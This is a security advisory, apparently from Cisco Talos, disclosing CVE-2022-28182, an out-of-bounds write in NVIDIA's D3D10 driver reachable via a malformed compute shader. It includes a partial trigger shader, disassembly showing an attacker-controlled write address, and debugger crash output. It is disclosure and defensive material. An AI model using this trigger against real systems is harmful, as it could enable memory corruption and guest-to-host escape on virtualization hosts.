CVE-2022-28182
A memory corruption vulnerability exists in the shader DCL_UNORDERED_ACCESS_VIEW_STRUCTURED functionality of NVIDIA D3D10 Driver version 496.76, 30.0.14.9676. A specially-crafted executable / shader file can lead to memory corruption. This vulnerability potentially could be triggered from guest machines running virtualization environments (i.e. VMware, qemu, VirtualBox etc.) in order to perform guest-to-host escape, as it was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly).
NVIDIA D3D10 Driver 496.76, 30.0.14.9676
D3D10 Driver - https://nvidia.com
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.
We were able to trigger this vulnerability from HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software (for example, those running an older version of Windows Server).
This vulnerability can be triggered by supplying a malformed compute shader. This leads to a memory corruption problem in NVIDIA driver.
Example of compute shader triggering the bug:
cs_5_0
dcl_global_flags refactoringAllowed
dcl_resource_structured resource[0]
dcl_resource_structured resource[3]
dcl_unordered_access_view_structured u-572719104
...
By modifying the dcl_unordered_access_view_structured opcode operands, an attacker is able to trigger a memory corruption vulnerability in the NVIDIA graphics driver.
The attacker can partially control the destination address by modifying the shader’s bytecode.
00007FFAF45B2984 | 4B:8D3476 | lea rsi,qword ptr ds:[r14+r14*2] |
00007FFAF45B2988 | 8B8424 C8000000 | mov eax,dword ptr ss:[rsp+C8] |
00007FFAF45B298F | 0FB69424 E0000000 | movzx edx,byte ptr ss:[rsp+E0] |
00007FFAF45B2997 | 44:0FB68424 E8000000 | movzx r8d,byte ptr ss:[rsp+E8] |
00007FFAF45B29A0 | 48:C1E6 04 | shl rsi,4 |
00007FFAF45B29A4 | 89040E | mov dword ptr ds:[rsi+rcx],eax |
The attacker can control R14 register, which is later “used” by the MOV instruction as a memory destination address.
This leads to arbitrary memory write where attacker can control the destination address.
nvwgf2umx+0x729a4:
00007ffa`f45b29a4 89040e mov dword ptr [rsi+rcx],eax ds:0000019c`d558b910=????????
Stack trace:
0:014> kb
# RetAddr : Args to Child : Call Site
00 00007ffa`f4888016 : 000001a3`3be89070 00000000`50000163 00000000`00000020 00000000`dddd0000 : nvwgf2umx+0x729a4
01 00007ffa`f4a6c3ca : 00000071`dc7bf180 00000071`dc7bf100 00000006`00000006 00000006`00000006 : nvwgf2umx!NVDEV_Thunk+0x643d6
02 00007ffa`f4872fff : 00007ffa`f48b89e0 000001a3`3be89070 000001a3`3be89070 00000000`3a010000 : nvwgf2umx!NVDEV_Thunk+0x24878a
03 00007ffa`f4871cf3 : 00000000`3a01009e 00000071`dc7bf690 00000000`3a01009e 000001a3`3be5f230 : nvwgf2umx!NVDEV_Thunk+0x4f3bf
04 00007ffa`f45fb0b0 : 00000000`00000005 00000000`00000000 000001a3`3be617d0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x4e0b3
05 00007ffa`f45fc686 : 000001a3`3be5f230 000001a3`3be56dc0 000001a3`3be56dd0 00000000`00000000 : nvwgf2umx+0xbb0b0
06 00007ffa`f49908e5 : 00000000`00000000 000001a3`3be54a10 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc686
07 00007ffa`f4990698 : 00000000`00000000 000001a3`3bfa0d80 00000000`00000002 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
08 00007ffa`f4aaf87c : 000001a3`3bf07b60 00000000`00000000 000001a3`3bf07b60 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
09 00007ffa`f5828d58 : 00000000`00000000 00000000`00000000 000001a3`3be3d890 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
0a 00007ffb`531d7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
0b 00007ffb`53e82651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.Sec
Value: 0
Key : Analysis.DebugAnalysisProvider.CPP
Value: Create: 8007007e on IAMLEGION
Key : Analysis.DebugData
Value: CreateObject
Key : Analysis.DebugModel
Value: CreateObject
Key : Analysis.Elapsed.Sec
Value: 39
Key : Analysis.Memory.CommitPeak.Mb
Value: 74
Key : Analysis.System
Value: CreateObject
Key : Timeline.OS.Boot.DeltaSec
Value: 365974
Key : Timeline.Process.Start.DeltaSec
Value: 119
NTGLOBALFLAG: 470
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffaf45b29a4 (nvwgf2umx+0x00000000000729a4)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 0000019cd558b910
Attempt to write to address 0000019cd558b910
FAULTING_THREAD: 000012dc
PROCESS_NAME: POC_EXEC11.exe
WRITE_ADDRESS: 0000019cd558b910
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 0000019cd558b910
STACK_TEXT:
00000071`dc7bf010 00007ffa`f4888016 : 000001a3`3be89070 00000000`50000163 00000000`00000020 00000000`dddd0000 : nvwgf2umx+0x729a4
00000071`dc7bf0b0 00007ffa`f4a6c3ca : 00000071`dc7bf180 00000071`dc7bf100 00000006`00000006 00000006`00000006 : nvwgf2umx!NVDEV_Thunk+0x643d6
00000071`dc7bf130 00007ffa`f4872fff : 00007ffa`f48b89e0 000001a3`3be89070 000001a3`3be89070 00000000`3a010000 : nvwgf2umx!NVDEV_Thunk+0x24878a
00000071`dc7bf160 00007ffa`f4871cf3 : 00000000`3a01009e 00000071`dc7bf690 00000000`3a01009e 000001a3`3be5f230 : nvwgf2umx!NVDEV_Thunk+0x4f3bf
00000071`dc7bf610 00007ffa`f45fb0b0 : 00000000`00000005 00000000`00000000 000001a3`3be617d0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x4e0b3
00000071`dc7bf6d0 00007ffa`f45fc686 : 000001a3`3be5f230 000001a3`3be56dc0 000001a3`3be56dd0 00000000`00000000 : nvwgf2umx+0xbb0b0
00000071`dc7bf7d0 00007ffa`f49908e5 : 00000000`00000000 000001a3`3be54a10 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc686
00000071`dc7bfc40 00007ffa`f4990698 : 00000000`00000000 000001a3`3bfa0d80 00000000`00000002 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
00000071`dc7bfd50 00007ffa`f4aaf87c : 000001a3`3bf07b60 00000000`00000000 000001a3`3bf07b60 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
00000071`dc7bfe00 00007ffa`f5828d58 : 00000000`00000000 00000000`00000000 000001a3`3be3d890 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
00000071`dc7bfe50 00007ffb`531d7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
00000071`dc7bfe80 00007ffb`53e82651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000071`dc7bfeb0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx+729a4
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: ~14s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_nvwgf2umx.dll!Unknown
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
FAILURE_ID_HASH: {4468a1dc-4a01-79b1-d906-401b585901d4}
Followup: MachineOwner
---------
2022-01-13 - Vendor Disclosure
2022-05-16 - Vendor Patch Release
2022-05-17 - Public Release
Discovered by Piotr Bania of Cisco Talos.